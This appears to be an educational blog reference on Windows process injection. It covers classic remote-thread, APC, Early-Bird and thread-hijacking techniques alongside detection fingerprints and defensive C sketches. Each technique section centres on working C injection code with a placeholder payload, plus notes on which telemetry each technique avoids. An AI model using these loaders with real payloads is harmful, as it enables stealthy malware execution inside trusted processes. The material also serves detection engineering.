Windows Shellcode Injection: A Technical Reference
A technical reference covering the most common process injection techniques used in Windows malware — VirtualAllocEx/WriteProcessMemory, APC injection, early-bird injection, and thread hijacking. Includes C code, EDR evasion context, and detection points for each technique.
Note: This post is educational. Understanding how injection works is fundamental to detection engineering, malware analysis, and defensive product development.
Overview
Process injection is the mechanism by which code in one process executes in the context of another. Malware uses this to:
- Execute from a trusted process (evading application whitelisting)
- Access another process’s memory or handles
- Hide from simple process enumeration
The Windows API provides numerous primitives that can be combined to achieve injection. We’ll walk through the most prevalent techniques with working C code, then look at what each looks like to a defender.
Technique 1: Classic VirtualAllocEx / WriteProcessMemory
The textbook technique. Widely detected, but still used in commodity malware because it works.
How It Works
- Open a handle to the target process with PROCESS_ALL_ACCESS
- Allocate RWX memory in the target with VirtualAllocEx
- Copy shellcode in with WriteProcessMemory
- Create a remote thread at the shellcode address with CreateRemoteThread
Code
#include <windows.h>
#include <stdio.h>
// Placeholder shellcode — replace with real payload
// This is just a NOP sled + INT3 for demonstration
unsigned char shellcode[] = {
0x90, 0x90, 0x90, 0x90, // NOP sled
0xCC // INT3 (breakpoint)
};
SIZE_T shellcode_len = sizeof(shellcode);
BOOL inject_classic(DWORD pid) {
HANDLE hProcess = NULL;
HANDLE hThread = NULL;
LPVOID remote_mem = NULL;
BOOL result = FALSE;
// Step 1: Open the target process
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (!hProcess) {
fprintf(stderr, "[-] OpenProcess failed: %lu\n", GetLastError());
goto cleanup;
}
// Step 2: Allocate RWX memory in target
remote_mem = VirtualAllocEx(
hProcess,
NULL,
shellcode_len,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
if (!remote_mem) {
fprintf(stderr, "[-] VirtualAllocEx failed: %lu\n", GetLastError());
goto cleanup;
}
// Step 3: Write shellcode
SIZE_T bytes_written = 0;
if (!WriteProcessMemory(hProcess, remote_mem, shellcode, shellcode_len, &bytes_written)) {
fprintf(stderr, "[-] WriteProcessMemory failed: %lu\n", GetLastError());
goto cleanup;
}
// Step 4: Create remote thread
hThread = CreateRemoteThread(hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)remote_mem, NULL, 0, NULL);
if (!hThread) {
fprintf(stderr, "[-] CreateRemoteThread failed: %lu\n", GetLastError());
goto cleanup;
}
WaitForSingleObject(hThread, INFINITE);
result = TRUE;
printf("[+] Injection complete\n");
cleanup:
if (hThread) CloseHandle(hThread);
if (hProcess) CloseHandle(hProcess);
return result;
}
Detection Fingerprint
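| API Call | Event / Telemetry |
|---|---|
| OpenProcess | Sysmon Event ID 10 (ProcessAccess) |
| VirtualAllocEx | No native Sysmon event; ETW: Microsoft-Windows-Threat-Intelligence (remote allocation), EDR user-mode hooks |
| WriteProcessMemory | No native Sysmon event; ETW: Microsoft-Windows-Threat-Intelligence (remote write), EDR user-mode hooks |
| CreateRemoteThread | Sysmon Event ID 8 (CreateRemoteThread) |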
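From the defender's side, the OpenProcess row can be made concrete. Sysmon Event ID 10 records the access mask that was granted, and a detection can test whether that mask carries the rights the classic chain depends on. The following is a minimal sketch under stated assumptions: the function name `grants_injection_rights` and the `DEMO_` constants are hypothetical names introduced here for illustration. The constant values mirror the PROCESS_* rights in winnt.h and are redefined only so the sketch compiles without windows.h.

```c
#include <stdbool.h>
#include <stdint.h>

/* Values mirror the PROCESS_* access rights in winnt.h. They are redefined
   under a DEMO_ prefix (hypothetical names) so this compiles anywhere. */
#define DEMO_PROCESS_CREATE_THREAD 0x0002u
#define DEMO_PROCESS_VM_OPERATION  0x0008u
#define DEMO_PROCESS_VM_WRITE      0x0020u

/* Returns true when the granted mask includes every right the classic chain
   needs: allocate (VM_OPERATION), write (VM_WRITE), and start a thread
   (CREATE_THREAD). Extra bits in the mask do not matter. */
bool grants_injection_rights(uint32_t granted_access) {
    const uint32_t needed = DEMO_PROCESS_CREATE_THREAD |
                            DEMO_PROCESS_VM_OPERATION |
                            DEMO_PROCESS_VM_WRITE;
    return (granted_access & needed) == needed;
}
```

A mask of 0x1FFFFF (PROCESS_ALL_ACCESS on current Windows versions) passes this check, while a read-only mask such as 0x1410 does not. Plenty of legitimate software requests broad access, so a match is a reason to look at what the source process does next, not a verdict on its own.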
The RWX allocation is the loudest signal. Most EDRs flag PAGE_EXECUTE_READWRITE allocations in remote processes immediately.
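The RWX signal can be expressed as a simple predicate over memory region records. The sketch below assumes a hypothetical `region_info` struct whose fields correspond to State, Protect, and Type in MEMORY_BASIC_INFORMATION. The `DEMO_` constants carry the winnt.h values and are redefined only to keep the example free of windows.h. It illustrates the idea and is not how any particular EDR implements it.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Values mirror winnt.h; DEMO_ names are hypothetical. */
#define DEMO_MEM_COMMIT             0x00001000u
#define DEMO_MEM_PRIVATE            0x00020000u
#define DEMO_PAGE_EXECUTE_READWRITE 0x40u

/* Hypothetical record; fields correspond to MEMORY_BASIC_INFORMATION. */
typedef struct {
    uint64_t base;
    uint64_t size;
    uint32_t state;    /* MEM_COMMIT, MEM_RESERVE, or MEM_FREE */
    uint32_t protect;  /* base protection plus modifier bits   */
    uint32_t type;     /* MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE   */
} region_info;

/* Flags committed, private (not file-backed) memory that is both writable
   and executable. The low byte holds the base protection; modifier bits
   such as PAGE_GUARD (0x100) are masked off before comparing. */
bool is_suspicious_region(const region_info *r) {
    bool committed  = (r->state == DEMO_MEM_COMMIT);
    bool is_private = (r->type == DEMO_MEM_PRIVATE);
    bool rwx = ((r->protect & 0xFFu) == DEMO_PAGE_EXECUTE_READWRITE);
    return committed && is_private && rwx;
}

/* Counts flagged regions in an array of records. */
size_t count_suspicious_regions(const region_info *regions, size_t n) {
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        if (is_suspicious_region(&regions[i])) hits++;
    }
    return hits;
}
```

On a live system the records would presumably be filled by walking the target's address space with VirtualQueryEx. JIT engines (browsers, .NET, Java) also create private executable memory, so a real scanner would likely need an allowlist or additional context.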
Technique 2: APC Injection
Asynchronous Procedure Calls (APCs) are a Windows mechanism for executing functions in the context of a thread. Every thread has an APC queue; functions queued to it run when the thread enters an alertable wait state.
How It Works
- Open the target process and enumerate its threads
- Queue an APC to each thread with QueueUserAPC
- The APC fires when one of those threads enters an alertable wait by calling SleepEx, WaitForSingleObjectEx, etc. with bAlertable = TRUE
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
// Find all threads belonging to a process
DWORD* get_thread_ids(DWORD pid, DWORD* count) {
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (snapshot == INVALID_HANDLE_VALUE) return NULL;
THREADENTRY32 te = { .dwSize = sizeof(THREADENTRY32) };
DWORD capacity = 64;
DWORD* tids = (DWORD*)malloc(capacity * sizeof(DWORD));
*count = 0;
if (Thread32First(snapshot, &te)) {
do {
if (te.th32OwnerProcessID == pid) {
if (*count >= capacity) {
capacity *= 2;
tids = (DWORD*)realloc(tids, capacity * sizeof(DWORD));
}
tids[(*count)++] = te.th32ThreadID;
}
} while (Thread32Next(snapshot, &te));
}
CloseHandle(snapshot);
return tids;
}
BOOL inject_apc(DWORD pid, unsigned char* shellcode, SIZE_T len) {
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (!hProcess) return FALSE;
// Allocate and write shellcode (same as classic technique)
LPVOID remote_mem = VirtualAllocEx(hProcess, NULL, len,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!remote_mem) { CloseHandle(hProcess); return FALSE; }
SIZE_T written;
WriteProcessMemory(hProcess, remote_mem, shellcode, len, &written);
// Queue APC to all threads
DWORD thread_count = 0;
DWORD* tids = get_thread_ids(pid, &thread_count);
for (DWORD i = 0; i < thread_count; i++) {
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, tids[i]);
if (hThread) {
QueueUserAPC((PAPCFUNC)remote_mem, hThread, 0);
CloseHandle(hThread);
}
}
free(tids);
CloseHandle(hProcess);
printf("[+] APC queued to %lu threads in PID %lu\n", thread_count, pid);
return TRUE;
}
Reliability Problem
APC injection only executes when a thread enters an alertable wait. Many processes never do this on their main threads. The workaround is targeting processes known to use alertable waits (svchost.exe running certain services, explorer.exe, etc.) or using Early-Bird injection below.
Detection Fingerprint
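QueueUserAPC is less commonly monitored than CreateRemoteThread, and Sysmon has no dedicated event for it. Some EDRs check the APC target address against known-good regions such as loaded module images. The Microsoft-Windows-Threat-Intelligence ETW provider emits events for APCs queued into another process, but it is only available to protected anti-malware processes, so most commercial SIEMs don’t collect these events by default.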
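The "known-good region" check amounts to a range lookup: does the APC routine (or a thread start address) fall inside any loaded module image? Here is a minimal sketch, assuming a hypothetical `module_range` list that a sensor has already collected for the target process. Both the struct and the function name `address_in_any_module` are illustrative and not part of any real API.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical record: one loaded image, [base, base + size). */
typedef struct {
    uint64_t base;
    uint64_t size;
} module_range;

/* Returns true when addr lies inside any module image. An address outside
   every module points at private or mapped memory, which is what an
   injected APC routine or hijacked instruction pointer typically targets. */
bool address_in_any_module(uint64_t addr, const module_range *mods, size_t n) {
    for (size_t i = 0; i < n; i++) {
        /* The subtraction form avoids overflow in base + size. */
        if (addr >= mods[i].base && addr - mods[i].base < mods[i].size) {
            return true;
        }
    }
    return false;
}
```

A sensor would call this with the APC routine address from its telemetry and raise the event's priority when it returns false. The same lookup applies to the start address of a remote thread or to a new RIP/EIP value set through SetThreadContext.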
Technique 3: Early-Bird APC Injection
Early-Bird solves the alertable wait problem by creating a suspended process, queuing the APC before it runs any code, then resuming it. The first thing the main thread does on resume is process its APC queue.
BOOL inject_earlybird(const char* target_path, unsigned char* shellcode, SIZE_T len) {
STARTUPINFOA si = { .cb = sizeof(si) };
PROCESS_INFORMATION pi = {0};
// Create target process in suspended state
if (!CreateProcessA(
target_path, NULL, NULL, NULL,
FALSE,
CREATE_SUSPENDED, // <-- key flag
NULL, NULL, &si, &pi)) {
fprintf(stderr, "[-] CreateProcess failed: %lu\n", GetLastError());
return FALSE;
}
printf("[*] Created suspended PID: %lu, TID: %lu\n", pi.dwProcessId, pi.dwThreadId);
// Allocate and write shellcode
LPVOID remote_mem = VirtualAllocEx(pi.hProcess, NULL, len,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!remote_mem) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return FALSE;
}
SIZE_T written;
WriteProcessMemory(pi.hProcess, remote_mem, shellcode, len, &written);
// Queue APC to the main thread (it's still suspended)
QueueUserAPC((PAPCFUNC)remote_mem, pi.hThread, 0);
// Resume — main thread immediately enters alertable state via ntdll init
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
printf("[+] Early-bird injection complete\n");
return TRUE;
}
Early-Bird is reliable because the queued APC is delivered during thread initialization in ntdll, before the target image’s entry point runs. It also avoids remote thread creation, so it does not raise Sysmon Event ID 8, though it does create a new process whose parent-child relationship may itself look anomalous.
Technique 4: Thread Hijacking (SetThreadContext)
Hijack an existing thread by suspending it, overwriting its instruction pointer, and resuming.
BOOL inject_thread_hijack(DWORD pid, unsigned char* shellcode, SIZE_T len) {
// Find a suitable thread (not the main thread ideally)
DWORD thread_count = 0;
DWORD* tids = get_thread_ids(pid, &thread_count);
if (!tids || thread_count == 0) return FALSE;
DWORD target_tid = tids[0];
free(tids);
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, target_tid);
if (!hProcess || !hThread) return FALSE;
// Suspend the thread
SuspendThread(hThread);
// Get current context
CONTEXT ctx;
ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(hThread, &ctx);
// Allocate shellcode in target process
LPVOID remote_mem = VirtualAllocEx(hProcess, NULL, len,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
SIZE_T written;
WriteProcessMemory(hProcess, remote_mem, shellcode, len, &written);
// Redirect instruction pointer to shellcode
#ifdef _WIN64
ctx.Rip = (DWORD64)remote_mem;
#else
ctx.Eip = (DWORD)remote_mem;
#endif
SetThreadContext(hThread, &ctx);
// Resume thread — it will execute our shellcode
ResumeThread(hThread);
CloseHandle(hThread);
CloseHandle(hProcess);
printf("[+] Thread %lu hijacked in PID %lu\n", target_tid, pid);
return TRUE;
}
Limitations
Thread hijacking is disruptive to the target process: the hijacked thread never returns to its legitimate work. If the thread was in the middle of a database query or network request, the process may crash or hang. It also relies on SuspendThread, GetThreadContext, and SetThreadContext against a thread in another process, a sequence most EDRs monitor.
Comparison Summary
| Technique | Reliability | Noise Level | Primary Detection |
|---|---|---|---|
| Classic VirtualAllocEx | High | High | Sysmon EID 8, RWX alloc |
| APC Injection | Medium | Medium | QueueUserAPC on remote thread |
| Early-Bird APC | High | Medium | New process + QueueUserAPC |
| Thread Hijacking | Medium-High | High | SuspendThread + SetThreadContext |
Detection Perspective
If you’re building detections, the key behavioral indicators are:
- Cross-process memory allocation: VirtualAllocEx from a process that isn’t the target
- Cross-process write: WriteProcessMemory following a remote allocation
- Remote thread creation: CreateRemoteThread where the start address is in private allocated memory (not a known module)
- APC to remote thread: QueueUserAPC where the APC function address is in remote-allocated memory
- Suspended process + APC: CREATE_SUSPENDED process creation followed quickly by a remote write and QueueUserAPC to the main thread
- Context modification: SetThreadContext changing RIP/EIP to an address outside any loaded module
A single event isn’t sufficient — chains of events in sequence within a short time window are what matter. Process activity graphs (BloodHound-style, but for process behavior) are the right tool for catching these patterns.
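The sequencing idea can be sketched as a small correlation routine. The code below assumes a hypothetical, already-normalized event stream: `proc_event`, `event_kind`, and `has_injection_chain` are names introduced here for illustration and do not correspond to any real sensor schema. Events must be sorted by timestamp. EV_REMOTE_EXEC stands in for any of the execution triggers discussed above (remote thread creation, remote APC, or context modification).

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical normalized event types. */
typedef enum {
    EV_REMOTE_ALLOC,  /* cross-process allocation                   */
    EV_REMOTE_WRITE,  /* cross-process write                        */
    EV_REMOTE_EXEC,   /* remote thread, remote APC, or SetContext   */
    EV_OTHER
} event_kind;

typedef struct {
    uint64_t   time_ms;
    uint32_t   source_pid;
    uint32_t   target_pid;
    event_kind kind;
} proc_event;

/* Returns true if any (source, target) pair shows alloc -> write -> exec,
   in that order, with the exec no later than window_ms after the alloc.
   Assumes ev[] is sorted by time_ms ascending. */
bool has_injection_chain(const proc_event *ev, size_t n, uint64_t window_ms) {
    for (size_t i = 0; i < n; i++) {
        if (ev[i].kind != EV_REMOTE_ALLOC) continue;
        if (ev[i].source_pid == ev[i].target_pid) continue; /* not remote */
        int stage = 1; /* 1 = alloc seen, 2 = write seen */
        for (size_t j = i + 1; j < n; j++) {
            if (ev[j].time_ms - ev[i].time_ms > window_ms) break;
            if (ev[j].source_pid != ev[i].source_pid ||
                ev[j].target_pid != ev[i].target_pid) continue;
            if (stage == 1 && ev[j].kind == EV_REMOTE_WRITE) {
                stage = 2;
            } else if (stage == 2 && ev[j].kind == EV_REMOTE_EXEC) {
                return true;
            }
        }
    }
    return false;
}
```

The quadratic scan is fine for a short per-host buffer. A production pipeline would more likely key partial chains by (source, target) pair in a hash map and expire them as the window passes.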
Further Reading
The Windows Internals series (Yosifovich, Solomon, et al.) covers APC mechanics in detail. For detection engineering, the Elastic Detection Rules repository is a good reference for how these techniques translate to detection logic.